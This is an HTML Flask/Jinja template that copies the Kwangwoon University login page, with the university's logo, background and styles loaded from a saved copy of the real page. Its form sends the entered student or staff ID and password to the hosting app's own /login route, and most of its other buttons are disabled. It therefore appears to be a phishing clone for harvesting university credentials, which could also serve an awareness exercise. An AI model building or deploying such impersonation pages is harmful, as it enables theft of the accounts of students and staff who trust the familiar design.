<!DOCTYPE html>
<html lang="ko" style="background-color: #f8f9fa">

<head>
    <meta charset="UTF-8">
    <title>광운대학교 로그인 페이지</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="{{ url_for('static', filename='favicon.ico') }}" type="image/x-icon">
    <link rel="stylesheet" href="{{ url_for('static', filename='광운대학교 로그인 페이지_files/axboot.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='광운대학교 로그인 페이지_files/axicon.min.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='광운대학교 로그인 페이지_files/font-awesome.min.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='광운대학교 로그인 페이지_files/spv-frame.css') }}">
    <link rel="stylesheet" href="{{ url_for('static', filename='광운대학교 로그인 페이지_files/fonts.css') }}">
    
    <link rel="stylesheet" href="{{ url_for('static', filename='광운대학교 로그인 페이지_files/style-a810f33b3413ba8966e00079d940f043.css') }}">

    <style>
        .ax-body.login {
            color: #ccc;
            background: #000 url("{{ url_for('static', filename='광운대학교 로그인 페이지_files/loginbg.jpg') }}") no-repeat 0 0 !important;
            background-size: 100% !important;
            vertical-align: middle !important;
            position: relative;
            font-weight: 300;
            font-family: 'Noto Sans KR', "맑은 고딕", "Malgun Gothic", "Apple Gothic", "돋움", Dotum, "굴림", Gulim, sans-serif;
        }

        input::placeholder {
            font-size: 14px;
        }
    </style>

</head>

<body class="ax-body login">
    <div class="container">
        <div class="newpanel">
            <div class="panel-body">
                <div class="userLoginTitle">
                    <p><img src="{{ url_for('static', filename='광운대학교 로그인 페이지_files/logo.png') }}" alt="광운대학교"></p>
                </div>

                <div class="panel-body-inner">
                    <form id="loginForm" method="POST" action="/login" autocomplete="off">
                        <div class="login-form-input-group">
                            <div class="form-group">
                                <input type="text" id="loginId" name="username" class="form-control ime-false"
                                    placeholder="ID(학번 또는 사번)" maxlength="20" required>
                            </div>
                            <div class="form-group">
                                <input type="password" id="loginPwd" name="password" class="form-control ime-false"
                                    placeholder="PASSWORD" maxlength="32" required>
                            </div>
                        </div>

                        <div class="adminLogin-box">
                            <span class="chk">
                                <input type="checkbox" id="storeIdYn" title="아이디저장">
                                <label for="storeIdYn">아이디 저장</label>
                            </span>
                            <button type="submit" class="btn">&nbsp;&nbsp;로그인&nbsp;&nbsp;</button>
                        </div>

                        <div class="save-pwsearch">
                            <span class="pwsearch">
                                <button type="button" class="btn btn btn-darkgray3 pwdfind" disabled>&nbsp;비밀번호
                                    찾기</button>
                            </span>
                        </div>
                        <div class="btnwid">
                            <button type="button" class="btn btn btn-darkgray searchno" disabled>&nbsp;개인번호 조회</button>
                            <button type="button" class="btn btn btn-darkgray firstsave" disabled>&nbsp;비밀번호 최초
                                등록</button>
                        </div>
                    </form>
                </div>
            </div>

            <ul class="list-group">
                <li class="list-group-item">
                    <span class="icon">!</span>비밀번호 오류 5회 이상 로그인 제한
                </li>
            </ul>

            <a href="https://www.kw.ac.kr/ko/info/privacy.jsp" target="_blank" class="btn btn-darkgray3">개인정보처리방침</a>
        </div>
    </div>
</body>

</html>